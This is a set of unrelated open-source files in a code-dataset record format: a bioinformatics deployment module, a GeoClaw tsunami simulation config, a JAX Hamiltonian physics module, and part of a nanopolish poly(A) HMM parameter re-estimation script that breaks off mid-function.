raise ImportError("Require vmlauncher: https://github.com/jmchilton/vm-launcher")
FileTransferManager(**transfer_options).transfer_files(files, compressed_files)
def purge_tools():
env.safe_sudo("rm -rf %s" % env.install_dir)
def install_tools(tools_conf):
"""
"""
_install_tools(env, tools_conf)
def get_boolean_option(options, name, default=False):
if name not in options:
return default
else:
return options[name]
def get_main_options_string(options, key, default=''):
value = default
if key in options:
value = options[key]
return value
def __invoke_plugin_actions(env, actions, action_type, provided_args):
possible_actions = __get_plugin_actions(env, action_type)
for action in list(actions):
if action in possible_actions:
__invoke_plugin_action(env, possible_actions[action], provided_args)
actions.remove(action)
def __invoke_plugin_action(env, action_function, provided_args):
arg_spec = getargspec(action_function).args
args = [] if not arg_spec else provided_args
action_function(*args)
def __get_plugin_actions(env, action_type):
actions = {}
for plugin_module in __get_plugin_modules(env):
if hasattr(plugin_module, action_type):
for action_name, action_function in getattr(plugin_module, action_type).iteritems():
actions[action_name] = action_function
return actions
def __get_plugin_modules(env):
if not "plugin_modules" in env:
unsorted_module_names = __get_plugin_module_names( )
## Load modules in reverse order to allow hierarchical overrides
module_names = sorted(unsorted_module_names, reverse=True)
modules = []
for plugin_module_name in module_names:
try:
module = __import__(plugin_module_name)
for comp in plugin_module_name.split(".")[1:]:
module = getattr(module, comp)
modules.append(module)
except BaseException, exception:
exception_str = str(exception)
message = "%s rule module could not be loaded: %s" % (plugin_module_name, exception_str)
env.logger.warn(message)
continue
env.plugin_modules = modules
return env.plugin_modules
def __get_plugin_module_names():
plugin_module_dir = cloudbio.deploy.plugins.__path__[0]
names = []
for fname in os.listdir(plugin_module_dir):
if not(fname.startswith("_")) and fname.endswith(".py"):
rule_module_name = "cloudbio.deploy.plugins.%s" % fname[:-len(".py")]
names.append( rule_module_name )
return names
| heuermh/cloudbiolinux | cloudbio/deploy/__init__.py | Python | mit | 13,852 | [
"Galaxy"
] | e07b95ec6a33631b3a3794abf96bfc52274f36c9d85f37f4cdadfbc93508a506 |
../../../../share/pyshared/orca/flat_review.py | Alberto-Beralix/Beralix | i386-squashfs-root/usr/lib/python2.7/dist-packages/orca/flat_review.py | Python | gpl-3.0 | 46 | [
"ORCA"
] | 947a6d0d0c8ab4d46a8cdcc853f8c1e4e6eae2dadf14d05955868556d526a98c |
"""
Module to set up run time parameters for Clawpack -- AMRClaw code.
The values set in the function setrun are then written out to data files
that will be read in by the Fortran code.
"""
import os
import numpy as np
t_shelf = 3.2*3600 # time approaching continental slope
t_harbor = 3.5*3600 # time approaching harbor
try:
CLAW = os.environ['CLAW']
except:
raise Exception("*** Must first set CLAW enviornment variable")
# Scratch directory for storing topo and dtopo files:
scratch_dir = os.path.join(CLAW, 'geoclaw', 'scratch')
#------------------------------
def setrun(claw_pkg='geoclaw'):
#------------------------------
"""
Define the parameters used for running Clawpack.
INPUT:
claw_pkg expected to be "geoclaw" for this setrun.
OUTPUT:
rundata - object of class ClawRunData
"""
from clawpack.clawutil import data
assert claw_pkg.lower() == 'geoclaw', "Expected claw_pkg = 'geoclaw'"
num_dim = 2
rundata = data.ClawRunData(claw_pkg, num_dim)
#------------------------------------------------------------------
# GeoClaw specific parameters:
#------------------------------------------------------------------
rundata = setgeo(rundata)
#------------------------------------------------------------------
# Adjoint specific data:
#------------------------------------------------------------------
rundata = setadjoint(rundata)
#------------------------------------------------------------------
# Standard Clawpack parameters to be written to claw.data:
#------------------------------------------------------------------
clawdata = rundata.clawdata # initialized when rundata instantiated
# Set single grid parameters first.
# See below for AMR parameters.
# ---------------
# Spatial domain:
# ---------------
# Number of space dimensions:
clawdata.num_dim = num_dim
# Lower and upper edge of computational domain:
clawdata.lower[0] = 140.0 # xlower
clawdata.upper[0] = 250.0 # xupper
clawdata.lower[1] = 10.0 # ylower
clawdata.upper[1] = 62.0 # yupper
# Number of grid cells:
clawdata.num_cells[0] = 110 # mx
clawdata.num_cells[1] = 52 # my
# ---------------
# Size of system:
# ---------------
# Number of equations in the system:
clawdata.num_eqn = 3
# Number of auxiliary variables in the aux array (initialized in setaux)
clawdata.num_aux = 3
# Index of aux array corresponding to capacity function, if there is one:
clawdata.capa_index = 2
# -------------
# Initial time:
# -------------
clawdata.t0 = 0.0
# Restart from checkpoint file of a previous run?
# Note: If restarting, you must also change the Makefile to set:
# RESTART = True
# If restarting, t0 above should be from original run, and the
# restart_file 'fort.chkNNNNN' specified below should be in
# the OUTDIR indicated in Makefile.
clawdata.restart = False # True to restart from prior results
clawdata.restart_file = 'fort.chk00006' # File to use for restart data
# -------------
# Output times:
#--------------
# Specify at what times the results should be written to fort.q files.
# Note that the time integration stops after the final output time.
clawdata.output_style = 1
if clawdata.output_style==1:
# Output ntimes frames at equally spaced times up to tfinal:
# Can specify num_output_times = 0 for no output
clawdata.num_output_times = 22
clawdata.tfinal = 11*3600.
clawdata.output_t0 = False # output at initial (or restart) time?
elif clawdata.output_style == 2:
# Specify a list or numpy array of output times:
# Include t0 if you want output at the initial time.
clawdata.output_times = list(np.linspace(3600,3600*9,9))
elif clawdata.output_style == 3:
# Output every step_interval timesteps over total_steps timesteps:
clawdata.output_step_interval = 1
clawdata.total_steps = 1
clawdata.output_t0 = True # output at initial (or restart) time?
clawdata.output_format = 'binary' # 'ascii', 'binary', 'netcdf'
clawdata.output_q_components = 'all' # could be list such as [True,True]
clawdata.output_aux_components = 'none' # could be list
clawdata.output_aux_onlyonce = True # output aux arrays only at t0
# ---------------------------------------------------
# Verbosity of messages to screen during integration:
# ---------------------------------------------------
# The current t, dt, and cfl will be printed every time step
# at AMR levels <= verbosity. Set verbosity = 0 for no printing.
# (E.g. verbosity == 2 means print only on levels 1 and 2.)
clawdata.verbosity = 0
# --------------
# Time stepping:
# --------------
# if dt_variable==True: variable time steps used based on cfl_desired,
# if dt_variable==Falseixed time steps dt = dt_initial always used.
clawdata.dt_variable = True
# Initial time step for variable dt.
# (If dt_variable==0 then dt=dt_initial for all steps)
clawdata.dt_initial = 1
# Max time step to be allowed if variable dt used:
clawdata.dt_max = 1e+99
# Desired Courant number if variable dt used
clawdata.cfl_desired = 0.75
# max Courant number to allow without retaking step with a smaller dt:
clawdata.cfl_max = 1.0
# Maximum number of time steps to allow between output times:
clawdata.steps_max = 5000
# ------------------
# Method to be used:
# ------------------
# Order of accuracy: 1 => Godunov, 2 => Lax-Wendroff plus limiters
clawdata.order = 2
# Use dimensional splitting? (not yet available for AMR)
clawdata.dimensional_split = 'unsplit'
# For unsplit method, transverse_waves can be
# 0 or 'none' ==> donor cell (only normal solver used)
# 1 or 'increment' ==> corner transport of waves
# 2 or 'all' ==> corner transport of 2nd order corrections too
clawdata.transverse_waves = 2
# Number of waves in the Riemann solution:
clawdata.num_waves = 3
# List of limiters to use for each wave family:
# Required: len(limiter) == num_waves
# Some options:
# 0 or 'none' ==> no limiter (Lax-Wendroff)
# 1 or 'minmod' ==> minmod
# 2 or 'superbee' ==> superbee
# 3 or 'vanleer' ==> van Leer
# 4 or 'mc' ==> MC limiter
clawdata.limiter = ['vanleer', 'vanleer', 'vanleer']
clawdata.use_fwaves = True # True ==> use f-wave version of algorithms
# Source terms splitting:
# src_split == 0 or 'none' ==> no source term (src routine never called)
# src_split == 1 or 'godunov' ==> Godunov (1st order) splitting used,
# src_split == 2 or 'strang' ==> Strang (2nd order) splitting used, not recommended.
clawdata.source_split = 1
# --------------------
# Boundary conditions:
# --------------------
# Number of ghost cells (usually 2)
clawdata.num_ghost = 2
# Choice of BCs at xlower and xupper:
# 0 or 'user' => user specified (must modify bcNamr.f to use this option)
# 1 or 'extrap' => extrapolation (non-reflecting outflow)
# 2 or 'periodic' => periodic (must specify this at both boundaries)
# 3 or 'wall' => solid wall for systems where q(2) is normal velocity
clawdata.bc_lower[0] = 'extrap' # at xlower
clawdata.bc_upper[0] = 'extrap' # at xupper
clawdata.bc_lower[1] = 'extrap' # at ylower
clawdata.bc_upper[1] = 'extrap' # at yupper
# ---------------
# gauges:
# ---------------
gauges = rundata.gaugedata.gauges
# for gauges append lines of the form [gaugeno, x, y, t1, t2]
# Outside harbor:
gauges.append([1, 235.536, 41.67, t_shelf, 1.e10])
# Inside harbor:
gauges.append([2, 235.80917,41.74111,t_harbor, 1.e10])
# --------------
# Checkpointing:
# --------------
# Specify when checkpoint files should be created that can be
# used to restart a computation.
clawdata.checkpt_style = 0
if clawdata.checkpt_style == 0:
# Do not checkpoint at all
pass
elif clawdata.checkpt_style == 1:
# Checkpoint only at tfinal.
pass
elif clawdata.checkpt_style == 2:
# Specify a list of checkpoint times.
clawdata.checkpt_times = [0.1,0.15]
elif clawdata.checkpt_style == 3:
# Checkpoint every checkpt_interval timesteps (on Level 1)
# and at the final time.
clawdata.checkpt_interval = 5
# ---------------
# AMR parameters: (written to amr.data)
# ---------------
amrdata = rundata.amrdata
# max number of refinement levels:
amrdata.amr_levels_max = 4
# List of refinement ratios at each level (length at least amr_level_max-1)
amrdata.refinement_ratios_x = [5, 6, 6, 3, 30]
amrdata.refinement_ratios_y = [5, 6, 6, 3, 30]
amrdata.refinement_ratios_t = [5, 6, 6, 3, 4]
# Specify type of each aux variable in amrdata.auxtype.
# This must be a list of length num_aux, each element of which is one of:
# 'center', 'capacity', 'xleft', or 'yleft' (see documentation).
amrdata.aux_type = ['center', 'capacity', 'yleft']
# Flag for refinement based on Richardson error estimater:
amrdata.flag_richardson = False # use Richardson?
amrdata.flag_richardson_tol = 1.0 # Richardson tolerance
# Flag for refinement using routine flag2refine:
amrdata.flag2refine = True # use this?
amrdata.flag2refine_tol = 0.004 # tolerance used in this routine
# Note: this tolerance is not used in the surface-flagging method
# only the wave_tolerance is used (a geoclaw specific parameters)
# steps to take on each level L between regriddings of level L+1:
amrdata.regrid_interval = 3
# width of buffer zone around flagged points:
# (typically the same as regrid_interval so waves don't escape):
amrdata.regrid_buffer_width = 2
# clustering alg. cutoff for (# flagged pts) / (total # of cells refined)
# (closer to 1.0 => more small grids may be needed to cover flagged cells)
amrdata.clustering_cutoff = 0.7
# print info about each regridding up to this level:
amrdata.verbosity_regrid = 0
# ---------------
# Regions:
# ---------------
regions = rundata.regiondata.regions
# to specify regions of refinement append lines of the form
# [minlevel,maxlevel,t1,t2,x1,x2,y1,y2]
regions.append([1, 1, 0., 1e9, 0, 360, -90, 90]) #whole world
regions.append([1, 3, 0., 7*3600., 0, 360, -90, 90]) #whole world
regions.append([1, 3, 7*3600.,10*3600., 170., 360, 18, 90])
regions.append([1, 3, 10*3600.,1e9, 195., 360, -90, 90])
regions.append([4, 4, 0., 1800, 175, 195, 50, 54]) #earthquake source AASZ04
regions.append([3, 4, t_shelf, 1e9, 235, 238, 34, 43]) # between shelf and CC
regions.append([4, 4, t_shelf, 1e9, 235, 236, 41, 42])
regions.append([5, 5, t_shelf, 1e9, 235.5,235.83,41.6,41.8]) #only harbor
regions.append([5, 6, t_harbor, 1e9, 235.78,235.84,41.735,41.775]) #only harbor
# ----- For developers -----
# Toggle debugging print statements:
amrdata.dprint = False # print domain flags
amrdata.eprint = False # print err est flags
amrdata.edebug = False # even more err est flags
amrdata.gprint = False # grid bisection/clustering
amrdata.nprint = False # proper nesting output
amrdata.pprint = False # proj. of tagged points
amrdata.rprint = False # print regridding summary
amrdata.sprint = False # space/memory output
amrdata.tprint = False # time step reporting each level
amrdata.uprint = False # update/upbnd reporting
return rundata
# end of function setrun
# ----------------------
#-------------------
def setgeo(rundata):
#-------------------
"""
Set GeoClaw specific runtime parameters.
"""
try:
geo_data = rundata.geo_data
except:
print "*** Error, this rundata has no geo_data attribute"
raise AttributeError("Missing geo_data attribute")
# == Physics ==
geo_data.gravity = 9.81
geo_data.coordinate_system = 2
geo_data.earth_radius = 6367500.0
# == Forcing Options
geo_data.coriolis_forcing = False
# == Algorithm and Initial Conditions ==
tide_stage = 77.
geo_data.sea_level = (tide_stage - 77.)/100. # m relative to MHW
geo_data.dry_tolerance = 0.001
geo_data.friction_forcing = True
geo_data.manning_coefficient = 0.025
geo_data.friction_depth = 100.0
# Refinement settings
refinement_data = rundata.refinement_data
refinement_data.variable_dt_refinement_ratios = True
refinement_data.wave_tolerance = 0.14
refinement_data.deep_depth = 100.0
refinement_data.max_level_deep = 4
# == settopo.data values ==
topofiles = rundata.topo_data.topofiles
# for topography, append lines of the form
# [topotype, minlevel, maxlevel, t1, t2, fname]
topofiles.append([3, 1, 1, 0., 1.e10, \
scratch_dir + '/etopo1min170E124W40N61N.asc'])
topofiles.append([3, 1, 1, 0., 1.e10, \
scratch_dir + '/etopo4min120E110W0N62N.asc'])
topofiles.append([-3, 1, 1, 32000, 1.e10, scratch_dir + '/cc-1sec-c.asc'])
topofiles.append([3, 1, 1, 32000, 1.e10, scratch_dir + '/cc-1_3sec-c_pierless.asc'])
# == setdtopo.data values ==
rundata.dtopo_data.dtopofiles = []
dtopofiles = rundata.dtopo_data.dtopofiles
# for moving topography, append lines of the form :
# [topotype, minlevel,maxlevel,fname]
dtopodir = scratch_dir + '/'
dtopotype = 3
fname = dtopodir + 'AASZ04v2.tt3'
dtopofiles.append([dtopotype, 3, 3, fname])
# == setqinit.data values ==
rundata.qinit_data.qinit_type = 0
rundata.qinit_data.qinitfiles = []
qinitfiles = rundata.qinit_data.qinitfiles
# for qinit perturbations, append lines of the form: (<= 1 allowed for now!)
# [minlev, maxlev, fname]
# == fixedgrids.data values ==
rundata.fixed_grid_data.fixedgrids = []
fixedgrids = rundata.fixed_grid_data.fixedgrids
# for fixed grids append lines of the form
# [t1,t2,noutput,x1,x2,y1,y2,xpoints,ypoints,\
# ioutarrivaltimes,ioutsurfacemax]
# == fgmax.data values ==
fgmax_files = rundata.fgmax_data.fgmax_files
return rundata
# end of function setgeo
# ----------------------
#-------------------
def setadjoint(rundata):
#-------------------
"""
Reading in all of the checkpointed Adjoint files
"""
import glob
files = glob.glob("adjoint/_output/fort.tck*")
files.sort()
probdata = rundata.new_UserData(name='adjointdata',fname='adjoint.data')
probdata.add_param('numadjoints', len(files), 'Number of adjoint checkpoint files.')
counter = 1
for fname in files:
f = open(fname)
time = f.readline().split()[-1]
fname = '../' + fname.replace('tck','chk')
probdata.add_param('file' + str(counter), fname, 'Checkpoint file' + str(counter))
probdata.add_param('time' + str(counter), float(time), 'Time for file' + str(counter))
counter = counter + 1
return rundata
# end of function setadjoint
# ----------------------
if __name__ == '__main__':
# Set up run-time parameters and write all data files.
import sys
rundata = setrun(*sys.argv[1:])
rundata.write()
| clawpack/adjoint | paper1_examples/tsunami_Alaska/compare/setrun_sflag_hightol.py | Python | bsd-2-clause | 16,061 | [
"NetCDF"
] | e1568ba3e238b2471f032e9c3f1b5472fa875c3d8167726519aee7859a53de1d |
# Copyright 2020 DeepMind Technologies Limited.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module with all Hamiltonian systems that have analytic solutions."""
from typing import Any, Optional, Tuple
from dm_hamiltonian_dynamics_suite.hamiltonian_systems import hamiltonian
from dm_hamiltonian_dynamics_suite.hamiltonian_systems import phase_space
from dm_hamiltonian_dynamics_suite.hamiltonian_systems import utils
import jax.numpy as jnp
import jax.random as jnr
class PotentialFreeSystem(hamiltonian.TimeIndependentHamiltonianSystem):
"""A system where the potential energy is 0 and the kinetic is quadratic.
Parameters:
matrix - a positive semi-definite matrix used for the kinetic quadratic.
The Hamiltonian is:
p^T M p / 2
Initial state parameters:
min_radius - the minimum radius to sample from
max_radius - the maximum radius to sample from
"""
def __init__(
self,
system_dims: int,
eigen_values_range: utils.BoxRegion,
init_vector_range: utils.BoxRegion,
**kwargs):
super().__init__(system_dims=system_dims, **kwargs)
if eigen_values_range.dims != 0 and eigen_values_range.dims != system_dims:
raise ValueError(f"The eigen_values_range must be of the same dimensions "
f"as the system dimensions, but is "
f"{eigen_values_range.dims}.")
if init_vector_range.dims != 0 and init_vector_range.dims != system_dims:
raise ValueError(f"The init_vector_range must be of the same dimensions "
f"as the system dimensions, but is "
f"{init_vector_range.dims}.")
self.eigen_values_range = eigen_values_range
self.init_vector_range = init_vector_range
def _hamiltonian(
self,
y: phase_space.PhaseSpace,
params: utils.Params,
**kwargs: Any
) -> jnp.ndarray:
assert len(params) == 1
matrix = params["matrix"]
potential = 0
kinetic = jnp.sum(jnp.matmul(y.p, matrix) * y.p, axis=-1) / 2
return potential + kinetic
def sample_y(
self,
num_samples: int,
params: utils.Params,
rng_key: jnp.ndarray,
**kwargs: Any
) -> phase_space.PhaseSpace:
# Sample random state
y = jnr.uniform(rng_key, [num_samples, 2 * self.system_dims],
dtype=self.dtype)
y = self.init_vector_range.convert_from_unit_interval(y)
return phase_space.PhaseSpace.from_state(y)
def sample_params(
self,
num_samples: int,
rng_key: jnp.ndarray,
**kwargs: Any
) -> utils.Params:
key1, key2 = jnr.split(rng_key)
matrix_shape = [num_samples, self.system_dims, self.system_dims]
gaussian = jnr.normal(key1, matrix_shape)
q, _ = jnp.linalg.qr(gaussian)
eigs = jnr.uniform(key2, [num_samples, self.system_dims])
eigs = self.eigen_values_range.convert_from_unit_interval(eigs)
q_eigs = q * eigs[..., None]
matrix = jnp.matmul(q_eigs, jnp.swapaxes(q_eigs, -2, -1))
return dict(matrix=matrix)
def simulate_analytically(
self,
y0: phase_space.PhaseSpace,
t0: utils.FloatArray,
t_eval: jnp.ndarray,
params: utils.Params,
**kwargs: Any
) -> Optional[phase_space.PhaseSpace]:
if self.friction != 0.0:
return None
assert len(params) == 1
matrix = params["matrix"]
t = utils.expand_to_rank_right(t_eval - t0, y0.q.ndim + 1)
q = y0.q[None] + utils.vecmul(matrix, y0.p)[None] * t
p = y0.p[None] * jnp.ones_like(t)
return phase_space.PhaseSpace(position=q, momentum=p)
def canvas_bounds(self) -> utils.BoxRegion:
raise NotImplementedError()
def canvas_position(
self,
position: jnp.ndarray,
params: utils.Params
) -> jnp.ndarray:
raise NotImplementedError()
def render_trajectories(
self,
position: jnp.ndarray,
params: utils.Params,
rng_key: jnp.ndarray,
**kwargs: Any
) -> Tuple[jnp.ndarray, utils.Params]:
raise NotImplementedError()
class KineticFreeSystem(PotentialFreeSystem):
"""A system where the kinetic energy is 0 and the potential is quadratic.
Parameters:
matrix - a positive semi-definite matrix used for the potential quadratic.
The Hamiltonian is:
q^T M q / 2
Initial state parameters:
min_radius - the minimum radius to sample from
max_radius - the maximum radius to sample from
"""
def _hamiltonian(
self,
y: phase_space.PhaseSpace,
params: utils.Params,
**kwargs: Any
) -> jnp.ndarray:
assert len(params) == 1
matrix = params["matrix"]
potential = jnp.sum(jnp.matmul(y.q, matrix) * y.q, axis=-1) / 2
kinetic = 0
return potential + kinetic
def simulate_analytically(
self,
y0: phase_space.PhaseSpace,
t0: utils.FloatArray,
t_eval: jnp.ndarray,
params: utils.Params,
**kwargs: Any
) -> Optional[phase_space.PhaseSpace]:
if self.friction != 0.0:
return None
assert len(params) == 1
matrix = params["matrix"]
t = utils.expand_to_rank_right(t_eval - t0, y0.q.ndim + 1)
q = y0.q[None] * jnp.ones_like(t)
p = y0.p[None] - utils.vecmul(matrix, y0.q)[None] * t
return phase_space.PhaseSpace(position=q, momentum=p)
def canvas_bounds(self) -> utils.BoxRegion:
raise NotImplementedError()
def canvas_position(
self,
position: jnp.ndarray,
params: utils.Params
) -> jnp.ndarray:
raise NotImplementedError()
def render_trajectories(
self,
position: jnp.ndarray,
params: utils.Params,
rng_key: jnp.ndarray,
**kwargs: Any
) -> Tuple[jnp.ndarray, utils.Params]:
raise NotImplementedError()
| deepmind/dm_hamiltonian_dynamics_suite | dm_hamiltonian_dynamics_suite/hamiltonian_systems/simple_analytic.py | Python | apache-2.0 | 6,192 | [
"Gaussian"
] | 0afc2e7533d1ffee0a548f8a420589ee57059b897c0bbf1fb3f2d5e06a4dc9da |
#! /usr/bin/env python3
"""
reestimate_polya_emissions.py: given two `polya-samples` TSV files based on different
underlying kmer models (with the newer TSV giving failing poly(A) segmentations),
infer the best new parameters for the HMM emissions.
Usage:
$ python reestimate_polya_emissions.py samples.old.tsv seg.old.tsv samples.new.tsv
where:
* `samples.old.tsv` is the output of `nanopolish polya -vv [...] | grep 'polya-samples'`,
generated by the **old** kmer models;
* `seg.old.tsv` is the output of `nanopolish polya -v [...] | grep 'polya-segmentation'`,
generated by the **old** kmer models;
* `samples.new.tsv` is the output of `nanopolish polya -vv [...] | grep 'polya-samples'`,
generated by the **new** kmer models.
Dependencies:
* numpy >= 1.11.2
* scipy >= 0.18.1
* sklearn >= 0.18.1
"""
import csv
import numpy as np
import argparse
import os
from scipy.stats import norm
from sklearn.mixture import GaussianMixture
log_inv_sqrt_2pi = np.log(0.3989422804014327)
def log_normal_pdf(xs, mu, sigma):
"""Compute the log-normal PDF of a given sample(s) against a mu and sigma."""
alpha = (xs - mu) * np.reciprocal(sigma)
return ( log_inv_sqrt_2pi - np.log(sigma) + (-0.5 * alpha * alpha) )
def fit_gaussian(samples):
"""Given a numpy array of floating point samples, fit a gaussian distribution."""
mu, sigma = norm.fit(samples)
return (mu,sigma)
def fit_gmm(samples, ncomponents=2):
"""Given a numpy array of floating point samples, fit a gaussian mixture model."""
# assume samples is of shape (NSAMPLES,); unsqueeze to (NSAMPLES,1) and train a GMM:
gmm = GaussianMixture(n_components=ncomponents)
gmm.fit(samples.reshape(-1,1))
# return params of GMM in [(coeff, mu, sigma)] format:
params = [(gmm.weights_[c], gmm.means_[c][0], gmm.covariances_[c][0][0]) for c in range(ncomponents)]
return params
def old_tsv_to_numpy(tsv_path):
"""
Read a TSV containing raw samples and return a dictionary consisting
of the following numpy datasets:
* S_loglkhd: the log-likelihoods of the samples belonging to the START segment.
* L_loglkhd: the log-likelihoods of the samples belonging to the LEADER segment.
* A_loglkhd: the log-likelihoods of the samples belonging to the ADAPTER segment.
* P_loglkhd: the log-likelihoods of the samples belonging to the POLYA segment.
* T_loglkhd: the log-likelihoods of the samples belonging to the TRANSCRIPT segment.
"""
# instantiate arrays to hold values:
S_loglkhd = []
L_loglkhd = []
A_loglkhd = []
P_loglkhd = []
T_loglkhd = []
# loop over TSV file and append data to arrays:
str2int = { 'START': 0, 'LEADER': 1, 'ADAPTER': 2, 'POLYA': 3, 'TRANSCRIPT': 5 }
with open(tsv_path, 'r') as f:
headers = ['tag','read_id', 'chr', 'idx', 'sample', 'scaled_sample',
's_llh', 'l_llh','a_llh','p_llh', 'c_llh', 't_llh','region']
rdr = csv.DictReader(f, delimiter='\t', quoting=csv.QUOTE_NONE, fieldnames=headers)
for row in rdr:
# parse row fields:
s_llh = float(row['s_llh'])
l_llh = float(row['l_llh'])
a_llh = float(row['a_llh'])
p_llh = float(row['p_llh'])
t_llh = float(row['t_llh'])
region = row['region']
# append log-likelihoods to appropriate arrays:
if region == 'START':
S_loglkhd.append(s_llh)
if region == 'LEADER':
L_loglkhd.append(l_llh)
if region == 'ADAPTER':
A_loglkhd.append(a_llh)
if region == 'POLYA':
P_loglkhd.append(p_llh)
if region == 'TRANSCRIPT':
T_loglkhd.append(t_llh)
return { "S_loglkhd": np.array(S_loglkhd, dtype=float),
"L_loglkhd": np.array(L_loglkhd, dtype=float),
"A_loglkhd": np.array(A_loglkhd, dtype=float),
"P_loglkhd": np.array(P_loglkhd, dtype=float),
"T_loglkhd": np.array(T_loglkhd, dtype=float) }
def make_segmentation_dict(segmentations_tsv_path):
"""
Load a segmentations TSV file. Rows of `segmentations_tsv_path` look like this:
tag read_id: pos: L_0 A_0: P_0: P_1: RR: P(A)L: AL:
polya-segmentation fc06... 161684804 47.0 1851.0 8354.0 11424.0 73.76 75.18 35.23
Note that this function only takes the first available segmentation for each read, i.e.
if a read id appears more than once in the TSV, only the first segmentation is kept, and
later occurrences of the read id in the TSV are ignored.
"""
segments = {}
# loop thru TSV and update the list of segmentations:
with open(segmentations_tsv_path, 'r') as f:
headers = ['tag', 'read_id', 'pos', 'L_start', 'A_start', 'P_start', 'P_end', 'rate', 'plen', 'alen']
rdr = csv.DictReader(f, delimiter='\t', quoting=csv.QUOTE_NONE, fieldnames=headers)
for row in rdr:
if row['read_id'] not in list(segments.keys()):
segments[row['read_id']] = { 'L_start': int(float(row['L_start'])),
'A_start': int(float(row['A_start'])),
'P_start': int(float(row['P_start'])),
'P_end': int(float(row['P_end'])) }
return segments
def region_search(read_id, sample_ix, segmentations):
"""
Given a dictionary of ("gold-standard") segmentations, look up the region that a
given read and sample index belongs to.
Returns an integer label out of 0,1,2,3,4,5 where:
0 => START, 1 => LEADER, 2 => ADAPTER, 3 => POLYA, 5 => TRANSCRIPT, 6 => UNKNOWN
(We skip label '4' because it represents CLIFFs, which we don't track here --- they have
a uniform distribution.)
"""
# find read ID in segmentations:
read_key = None
for long_read_id in list(segmentations.keys()):
if long_read_id[0:len(read_id)] == read_id:
read_key = long_read_id
# return UNK if read not found:
if read_key == None:
return 6
# find region that `sample_ix` belongs to:
l_start = segmentations[read_key]['L_start']
a_start = segmentations[read_key]['A_start']
p_start = segmentations[read_key]['P_start']
p_end = segmentations[read_key]['P_end']
if (sample_ix < l_start):
return 0
if (sample_ix < a_start):
return 1
if (sample_ix < p_start):
return 2
if (sample_ix <= p_end):
return 3
if (sample_ix > p_end):
return 5
return 6
def new_tsv_to_numpy(tsv_path, segmentations):
"""
Read a TSV of new, miscalled samples and a dictionary of correct segmentations (coming from
an older, correct TSV) and return a dict of numpy arrays.
Args:
* tsv_path: path to a TSV generated by `nanopolish polya -vv [...]`.
* segmentations: a dictionary of segmentation intervals, given in numpy format.
Returns: a dictionary of numpy arrays.
"""
# instantiate arrays to hold values:
S_samples = []
L_samples = []
A_samples = []
P_samples = []
T_samples = []
# loop over TSV file and append data to arrays:
with open(tsv_path, 'r') as f:
headers = ['tag','read_id', 'chr', 'idx', 'sample', 'scaled_sample',
's_llh', 'l_llh','a_llh','p_llh', 'c_llh', 't_llh','region']
rdr = csv.DictReader(f, delimiter='\t', quoting=csv.QUOTE_NONE, fieldnames=headers)
for row in rdr:
scaled_sample = float(row['scaled_sample'])
read = row['read_id']
contig = row['chr']
index = int(row['idx'])
region = region_search(read, index, segmentations)
if region == 0:
S_samples.append(scaled_sample)
if region == 1:
L_samples.append(scaled_sample)
if region == 2:
A_samples.append(scaled_sample)
if region == 3:
P_samples.append(scaled_sample)
if region == 5:
T_samples.append(scaled_sample)
return { "S_samples": np.array(S_samples, dtype=float),
"L_samples": np.array(L_samples, dtype=float),
"A_samples": np.array(A_samples, dtype=float),
"P_samples": np.array(P_samples, dtype=float),
"T_samples": np.array(T_samples, dtype=float) }
def main(old_samples_tsv, old_segmentations_tsv, new_samples_tsv, benchmark=True):
"""
Infer and print the new values for mu and sigma (for each of S, L, A, P, C, T) to STDOUT.
Args:
* old_samples_tsv: path to TSV file containing polya-samples data from an older kmer model.
* old_segmentations_tsv: path to TSV file containing polya-segmentation data from an older kmer model.
* new_samples_tsv: path to TSV file containing polya-samples data from the newer kmer model.
Returns: N/A, prints outputs to STDOUT.
"""
### read all samples into numpy arrays:
print("Loading data from TSV...")
old_data = old_tsv_to_numpy(old_samples_tsv)
segmentations = make_segmentation_dict(old_segmentations_tsv)
new_data = new_tsv_to_numpy(new_samples_tsv, segmentations)
print("... Datasets loaded.")
### infer best possible new mu,sigma for each of S, L, A, P, T:
print("Fitting gaussians to new scaled samples (this may take a while)...")
new_mu_S, new_sigma_S = fit_gaussian(new_data['S_samples'])
new_mu_L, new_sigma_L = fit_gaussian(new_data['L_samples'])
(new_pi0_A, new_mu0_A, new_sig0_A), (new_pi1_A, new_mu1_A, new_sig1_A) = fit_gmm(new_data['A_samples'], ncomponents=2)
new_mu_P, new_sigma_P = fit_gaussian(new_data['P_samples'])
(new_pi0_T, new_mu0_T, new_sig0_T), (new_pi1_T, new_mu1_T, new_sig1_T) = fit_gmm(new_data['T_samples'], ncomponents=2)
### print to stdout:
print("New params for START: mu = {0}, var = {1}, stdv = {2}".format(new_mu_S, new_sigma_S, np.sqrt(new_sigma_S)))
print("New params for LEADER: mu = {0}, var = {1}, stdv = {2}".format(new_mu_L, new_sigma_L, np.sqrt(new_sigma_L)))
print("New params for ADAPTER0: pi = {0}, mu = {1}, var = {2}, stdv = {3}".format(new_pi0_A, new_mu0_A, new_sig0_A, np.sqrt(new_sig0_A)))
print("New params for ADAPTER1: pi = {0}, mu = {1}, var = {2}, stdv = {3}".format(new_pi1_A, new_mu1_A, new_sig1_A, np.sqrt(new_sig1_A)))
print("New params for POLYA: mu = {0}, var = {1}, stdv = {2}".format(new_mu_P, new_sigma_P, np.sqrt(new_sigma_P)))
print("New params for TRANSCR0: pi = {0}, mu = {1}, var = {2}, stdv = {3}".format(new_pi0_T, new_mu0_T, new_sig0_T, np.sqrt(new_sig0_T)))
print("New params for TRANSCR1: pi = {0}, mu = {1}, var = {2}, stdv = {3}".format(new_pi1_T, new_mu1_T, new_sig1_T, np.sqrt(new_sig1_T)))
### optionally, benchmark:
if not benchmark:
return
print("===== Emission Log-Likelihood Benchmarks =====")
old_S_llh = np.mean(old_data['S_loglkhd'])
new_S_llh = np.mean(norm.logpdf(new_data['S_samples'], loc=new_mu_S, scale=np.sqrt(new_sigma_S)))
print("> Average START log-probs:")
print("> Old avg. log-likelihood: {0} | New avg. log-likelihood: {1}".format(old_S_llh, new_S_llh))
old_L_llh = np.mean(old_data['L_loglkhd'])
new_L_llh = np.mean(norm.logpdf(new_data['L_samples'], loc=new_mu_L, scale=np.sqrt(new_sigma_L)))
print("> Average LEADER log-probs:")
